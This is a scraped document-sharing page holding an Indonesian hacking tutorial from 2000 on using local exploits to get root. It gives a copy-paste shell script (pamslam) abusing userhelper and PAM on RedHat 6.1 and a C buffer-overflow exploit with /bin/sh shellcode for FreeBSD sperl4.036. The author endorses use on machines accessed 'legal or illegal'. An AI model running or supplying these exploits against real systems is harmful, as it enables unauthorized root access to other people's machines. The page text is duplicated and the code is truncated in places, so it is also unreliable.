Bagaimana Menggunakan Lokal Eksploit
This document was uploaded by user and they confirmed that they have the permission to share it. If you are author or own the copyright of this book, please report to us by using this DMCA report form. Report DMCA
Overview
Download & View Bagaimana Menggunakan Lokal Eksploit as PDF for free.
More details
- Words: 591
- Pages: 6
Koleksi Artikel dari Biasawae Community Copyleft 2004 biasawae.com
Bagaimana Menggunakan Lokal Eksploit Sumber : cbug aka CyberBug - Kecoak Elektronik
!
"
Koleksi Artikel dari Biasawae Community Copyleft 2004 biasawae.com Kata pembuka : Artikel ini saya buat karena melihat banyaknya pertanyaan di mailing list dan pertanyaan ke mail box saya tentang bagaimana sebenarnya menggunakan eksploit, bagaimana mendapatkan root ... btw saya bicara ttg *nix bukan windows. Berhubung RedHat adalah distro paling terkenal :( dan paling banyak di pakai di Indonesia, kita pake ini untuk contoh kita, kamu bisa gunakan RedHat 6.x atau Mandrake 6.x untuk tempat latihan ... dan FreeBSD 2.2.x utk contoh sploit yang harus di compile dulu. Perlu saya tambahkan sedikit, lokal eksploit maksudnya eksploit yang harus dilakukan langsung di mesin yang ingin di crack, ini berarti kamu harus mempunyai akses telnet ke mesin tsb (legal atau illegal ... whatever).
============================================================ Mendapatkan lokal root shell di RedHat 6.x atau Mandrake 6.x ============================================================ 1. Login atau telnet ke mesin kamu, user biasa (bukan root) 2. Ketik atau copy/paste skrip berikut ini, berinama: gimmerewt.sh ----------------------- mulai dari bawah sini -----------------#!/bin/sh # # pamslam - vulnerability in Redhat Linux 6.1 and PAM pam_start # found by [email protected] # # synopsis: #
both 'pam' and 'userhelper' (a setuid binary that comes with the
#
'usermode-1.15' rpm) follow .. paths. Since pam_start calls down to
#
_pam_add_handler(), we can get it to dlopen any file on disk. 'userhelper'
#
being setuid means we can get root.
# # fix: #
No fuckin idea for a good fix. Get rid of the .. paths in userhelper
#
for a quick fix. Remember 'strcat' isn't a very good way of confining
#
a path to a particular subdirectory.
Koleksi Artikel dari Biasawae Community Copyleft 2004 biasawae.com # # props to my mommy and daddy, cuz they made me drink my milk. cat > _pamslam.c << EOF #include<stdlib.h> #include #include<sys/types.h> void _init(void) { setuid(geteuid()); system("/bin/sh"); } EOF echo -n . echo -e auth\\trequired\\t$PWD/_pamslam.so > _pamslam.conf chmod 755 _pamslam.conf echo -n . gcc -fPIC -o _pamslam.o -c _pamslam.c echo -n o ld -shared -o _pamslam.so _pamslam.o echo -n o chmod 755 _pamslam.so echo -n O rm _pamslam.c rm _pamslam.o echo O
Koleksi Artikel dari Biasawae Community Copyleft 2004 biasawae.com
/usr/sbin/userhelper -w ../../..$PWD/_pamslam.conf sleep 1s rm _pamslam.so rm _pamslam.conf ------------------- garis ini jangan diketik bro ------------3. Set flag gimmerewt.sh ke executable chmod +x gimmerewt.sh 4. Jalankan ./gimmerewt.sh
======================================= Mendapatkan root shell di FreeBSD 2.2.x ======================================= (for my old friend in wasantara.com - try this, I know you have a long search for the hole :) ... well since I'm in a good mood, I tell you). 1. Login atau telnet ke mesin kamu, user biasa (bukan root) 2. Ketik atau copy/paste skrip berikut ini, berinama: gimmerewt.c ---------------------- mulai dari bawah ini -------------------/************************************************************/ /* Exploit for FreeBSD sperl4.036 by OVX /************************************************************/ #include <stdio.h> #include <stdlib.h> #include #define BUFFER_SIZE #define OFFSET
1400
600
*/
Koleksi Artikel dari Biasawae Community Copyleft 2004 biasawae.com char *get_esp(void) { asm("movl %esp,%eax"); } char buf[BUFFER_SIZE]; main(int argc, char *argv[]) { int i; char execshell[] = "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01" "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"; for(i=0+1;i
Koleksi Artikel dari Biasawae Community Copyleft 2004 biasawae.com Penutup : Saya harap tulisan singkat ini bisa membuka wawasan rekan2 yang senang main-main dengan komputer. Jangan main api, kalau takut terbakar ... OK? Salam dari Manado, [email protected] dinihari, 31 January 2000
Bagaimana Menggunakan Lokal Eksploit Sumber : cbug aka CyberBug - Kecoak Elektronik
!
"
Koleksi Artikel dari Biasawae Community Copyleft 2004 biasawae.com Kata pembuka : Artikel ini saya buat karena melihat banyaknya pertanyaan di mailing list dan pertanyaan ke mail box saya tentang bagaimana sebenarnya menggunakan eksploit, bagaimana mendapatkan root ... btw saya bicara ttg *nix bukan windows. Berhubung RedHat adalah distro paling terkenal :( dan paling banyak di pakai di Indonesia, kita pake ini untuk contoh kita, kamu bisa gunakan RedHat 6.x atau Mandrake 6.x untuk tempat latihan ... dan FreeBSD 2.2.x utk contoh sploit yang harus di compile dulu. Perlu saya tambahkan sedikit, lokal eksploit maksudnya eksploit yang harus dilakukan langsung di mesin yang ingin di crack, ini berarti kamu harus mempunyai akses telnet ke mesin tsb (legal atau illegal ... whatever).
============================================================ Mendapatkan lokal root shell di RedHat 6.x atau Mandrake 6.x ============================================================ 1. Login atau telnet ke mesin kamu, user biasa (bukan root) 2. Ketik atau copy/paste skrip berikut ini, berinama: gimmerewt.sh ----------------------- mulai dari bawah sini -----------------#!/bin/sh # # pamslam - vulnerability in Redhat Linux 6.1 and PAM pam_start # found by [email protected] # # synopsis: #
both 'pam' and 'userhelper' (a setuid binary that comes with the
#
'usermode-1.15' rpm) follow .. paths. Since pam_start calls down to
#
_pam_add_handler(), we can get it to dlopen any file on disk. 'userhelper'
#
being setuid means we can get root.
# # fix: #
No fuckin idea for a good fix. Get rid of the .. paths in userhelper
#
for a quick fix. Remember 'strcat' isn't a very good way of confining
#
a path to a particular subdirectory.
Koleksi Artikel dari Biasawae Community Copyleft 2004 biasawae.com # # props to my mommy and daddy, cuz they made me drink my milk. cat > _pamslam.c << EOF #include<stdlib.h> #include
Koleksi Artikel dari Biasawae Community Copyleft 2004 biasawae.com
/usr/sbin/userhelper -w ../../..$PWD/_pamslam.conf sleep 1s rm _pamslam.so rm _pamslam.conf ------------------- garis ini jangan diketik bro ------------3. Set flag gimmerewt.sh ke executable chmod +x gimmerewt.sh 4. Jalankan ./gimmerewt.sh
======================================= Mendapatkan root shell di FreeBSD 2.2.x ======================================= (for my old friend in wasantara.com - try this, I know you have a long search for the hole :) ... well since I'm in a good mood, I tell you). 1. Login atau telnet ke mesin kamu, user biasa (bukan root) 2. Ketik atau copy/paste skrip berikut ini, berinama: gimmerewt.c ---------------------- mulai dari bawah ini -------------------/************************************************************/ /* Exploit for FreeBSD sperl4.036 by OVX /************************************************************/ #include <stdio.h> #include <stdlib.h> #include
1400
600
*/
Koleksi Artikel dari Biasawae Community Copyleft 2004 biasawae.com char *get_esp(void) { asm("movl %esp,%eax"); } char buf[BUFFER_SIZE]; main(int argc, char *argv[]) { int i; char execshell[] = "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01" "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"; for(i=0+1;i
Koleksi Artikel dari Biasawae Community Copyleft 2004 biasawae.com Penutup : Saya harap tulisan singkat ini bisa membuka wawasan rekan2 yang senang main-main dengan komputer. Jangan main api, kalau takut terbakar ... OK? Salam dari Manado, [email protected] dinihari, 31 January 2000
Related Documents
Bagaimana Menggunakan Lokal Eksploit
June 2020 1
Bagaimana Menggunakan _wu-ftpd_ Remote Eksploit
June 2020 1
Sk Lokal
April 2020 24
Kearifan Lokal
August 2019 41
Pemula Lokal
October 2019 35